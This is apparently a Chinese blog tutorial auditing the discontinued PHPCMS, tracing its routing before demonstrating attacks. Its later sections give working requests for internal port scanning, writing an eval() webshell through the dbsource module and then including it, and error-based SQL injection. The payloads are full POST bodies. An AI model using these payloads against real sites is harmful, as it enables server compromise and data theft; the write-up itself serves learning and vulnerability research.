代码审计-phpcms

最新推荐文章于 2024-01-09 11:20:05 发布

XG小刚

最新推荐文章于 2024-01-09 11:20:05 发布

阅读量488

点赞数 1

分类专栏：代码审计文章标签： php 代码审计安全

本文链接：https://blog.csdn.net/weixin_43221560/article/details/111173172

版权

代码审计专栏收录该内容

8 篇文章 1 订阅

订阅专栏

作者：小刚
一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢
本实验仅用于信息防御教学，切勿用于其它用途

phpcms代码审计

代码审计-phpcms

代码审计-phpcms

最近在学习php代码审计，各种复现、各种测试搞得我头昏脑胀。网上很多代码审计的复现博客看似讲的很清楚，最后自己也复现出来了，但是很多小白（比如我）以为懂了这个漏洞，但实际连参数都不知道怎么传进去的。

跟着反向追踪传参过程是很快速高效，但遇到那种框架写的cms就懵逼了，找不到被利用的点，找不到为啥会被传进参数来。。。

所以，该来的还是要来的，正向通读代码。

（代码审计当然要提前搭建一个简单好用的环境、还要有个趁手的编辑器）

低版本phpcms

phpcms虽然已经停止维护了，但不妨碍我们拿来学习审计，小白最好还是找个简单、低版本的开始审计。

通读代码

目录结构

打开代码，首先观察目录结构

可以看到，根目录下有四个php文件（称之为入口文件）
admin.php、api.php、index.php、plugin.php
四个文件什么功能一目了然啊。

然后是好几个文件夹，
api下存放api接口文件
caches下存放缓存、备份文件等等
html下是空的暂时不提
phpcms下存放大部分的模块、模板、插件等等
phpsso_server是一个安装过程选择的功能，暂时不管
static下存放各种css，js静态文件
uploadfile顾名思义存放上传的文件

网站入口

正常来说inde.php就是整个网站的入口，直接看index.php做了什么
在这里插入图片描述

先定义了一个常量
（在审计过程中，会遇到很多常量，我们可以使用get_defined_constant()函数将所有常量打印出来，然后用哪个查哪个）

13行包含了/pnpcms/base.php文件，那过去看看
在这里插入图片描述
可以看到这是框架的入口，定义了许多常量
然后29-33行加载了两个函数库和一个配置文件system，使用了自动加载函数auto_load_func()

先不看加载了什么函数库，先去看看怎么加载的
在62行往后，定义了pc_base类，然后通读一下这个类的各种函数
在这里插入图片描述

返回头看上面加载的几个函数库

加载global使用的pc_base类的load_sys_func()函数
找到函数定义位置,global传参到$func
在这里插入图片描述
141行，这个函数引用了自身类的_load_func()函数，global传参到 $func

阅读函数，可以了解到212行构造了路径$path=libs\functions\global.func.php
215行判断文件是否存在，并包含该文件。

发现是加载了公共函数库，里面基本是cms所用到各种公共函数，通读一下，看看各种过滤函数，然后特别注意各种可以用的函数。
同样看看extention.func.php，结果是自定义函数库没东西
在这里插入图片描述

查看自动加载函数

找到auto_load_func()定义位置，
在这里插入图片描述
149行使用了_auto_load_func()

阅读发现自动包含libs\functions\autoload\下的所有.func.php文件，找到文件通读代码。

跳回index.php

阅读完加载的函数库后，发现一个问题，网站咋加载呢。
大意了啊，回到index.php,发现使用了creat_app()函数
在这里插入图片描述
再次回去，看看是怎么加载网站的，使用了load_sys_class()函数传入参数application

77行使用了_load_class()函数

经几个逻辑判断，构造路径，然后包含了phpcms\libs\classes\application.class.php文件
在下面发现实例化了一个类$classes[$key] = new $name;$name传参是application

哪来的这个类，请看phpcms\libs\classes\application.class.php

参数传递

打开文件，定义了一个类appliaction
而且该类被上面函数实例化，直接触发了__construct()魔术方法
在这里插入图片描述
同样使用load_sys_class()加载了param.class.php参数处理类文件，
并实例化param类，使用param类的三个函数

三个方法通过GET或者POST传入了三个参数m,c,a
m是模型，c是控制器，a是事件

传入的参数在application类中定义为三个常量，并使用init()进行初始化
在这里插入图片描述
阅读appliction类发现，该类通过m,c,a三个参数来加载整个网站的应用

m是加载phpcms\modules\目录下的模块，也就是文件夹
c是加载模块下的控制器，也就是php文件
a是控制器里面的事件，也就是php文件里面的函数
在这里插入图片描述

比如：想使用admin模块下database.php控制器的export()函数
传参：index.php?m=admin&c=database&a=export

知道了参数的传参方式，想反向找利用点就简单多了。

开始审计

知道了m，c，a参数的含义，phpcms\modules\下的函数就可以轻松利用了

端口探测

在phpcms\modules\search\search_admin.php文件内有个public_test_sphinx()函数
在这里插入图片描述
105行发现一个sockopen()函数，用来打开一个网络连接或者一个Unix套接字连接
post传入的sphinxhost和sphinxport没有进行过滤
sphinxhost是ip地址、sphinxport是端口
这样我们可以通过这个函数进行内网端口探测

http://192.168.1.1/index.php?m=search&c=search_admin&a=public_test_sphinx

post：sphinxhost=127.0.0.1&sphinxport=3306

在这里插入图片描述
经测试，当内网端口存在时返回1
不存在时返回10060

后台Getshell

在phpcms\modules\dbsource\data.php文件里有个add()函数
在这里插入图片描述
在82行有个file_put_content()函数，将$str写入caches\caches_template\dbsource\$id.php文件当中

追踪$str来源，原来是查询了数据库的$id行template的值
往上看代码，62行发现template值可以post控制，其他的name,type,dis_type,cache,num都由上面post传入，
70行将内容插入了数据库当中。记住dis_type=3后面有用
在这里插入图片描述
既然参数都可控，那就post传入所需要的值，
template传入一句话木马，使逻辑能跑到file_put_contents函数。

192.168.1.1/index.php?m=dbsource&c=data&a=add&pc_hash=saLcKR

post：dosubmit=1&name=666&dis_type=3&type=1&data=select 1&template=<?php @eval($_GET[xg]);?>&num=1&cache=2

这里测试发现需要登录后台，那就算个后台getshell了，登录后台给了个pc_hash=saLcKR
在这里插入图片描述
结果发现没什么响应
不急，去caches\caches_template\dbsource\下发现多了个文件39.php，成功写入了一句话木马。

这里虽然成功写入了一句话，但发现前面有个限制
如果没定义IN_PHPCMS常量，就exit退出，说明不能直接访问，这不白传了吗。

但仔细思考，不能直接访问，那就说明这个文件是用来被包含的。
那就直接搜谁包含此文件，但这个文件名是动态生成的，所以我们得搜他所在的目录dbsource
在这里插入图片描述
发现全局函数库中有个template_url()函数构造了我们需要被引用的路径

逻辑就是传入id，判断文件是否存在，不存在就构建，存在就返回路径
返回的路径有了，那就看看这个函数被谁引用了
在phpcms\modules\dbsource\call.php的_format函数中使用了此方法
在这里插入图片描述
当$type为3时
65行进行文件包含。既然文件包含出来了，说明可以利用

继续看看_format()函数被谁使用，由于是private定义，所以只能在此文件内搜索
然后在get()函数的39行发现使用的_format()函数
在这里插入图片描述

id是通过我们GET传参控制，$str与我们无关，关键是$data['dis_type']要等于3

$data哪来的呢?

发现11行进行了sql查询，正是我们刚开始写一句话时候的传入的dis_type=3
那利用直接一目了然，只传参$id就可

192.168.1.1/index.php?m=dbsource&c=call&a=get&id=39&xg=phpinfo();

在这里插入图片描述
起飞

SQL注入

其实在phpcms\modules\dbsource\data.php文件add()函数里
在第33行有个参数data，为自定义sql
在这里插入图片描述
在我们测试上面getshell过程中发现，如果data随便传入一个数据1233
进行包含一句话文件时候，会出现SQL语句报错，这意味着这里执行了SQL语句。

那漏洞来了，我们在data传入sql语句呢?
先来个报错注入

192.168.1.1/index.php?m=dbsource&c=data&a=add&pc_hash=saLcKR

post：dosubmit=1&name=667&dis_type=3&type=1&data=select 1 and updatexml(1,concat(1,user(),0x7e,database(),0x7e,version()),1)&template=<?php @eval($_GET[xg]);?>&num=1&cache=2

发现依旧在caches\caches_template\dbsource\下生成了40.php

192.168.1.1/index.php?m=dbsource&c=call&a=get&id=40

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LBmsjr9S-1607931375823)(C:\Users\lcg17\AppData\Roaming\Typora\typora-user-images\1607503771175.png)]$
起飞

XG小刚

关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
代码审计-phpcms

作者：小刚一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢本实验仅用于信息防御教学，切勿用于其它用途phpcms代码审计代码审计-phpcms低版本phpcms通读代码目录结构网站入口返回头看上面加载的几个函数库查看自动加载函数跳回index.php参数传递开始审计端口探测后台GetshellSQL注入代码审计-phpcms最近在学习php代码审计，各种复现、各种测试搞得我头昏脑胀。网上很多代码审计的复现博客看似讲的很清楚，最后自己也复现出来了，但是很多小白（比如我）以为懂了这个漏洞，但实际.
复制链接

扫一扫

专栏目录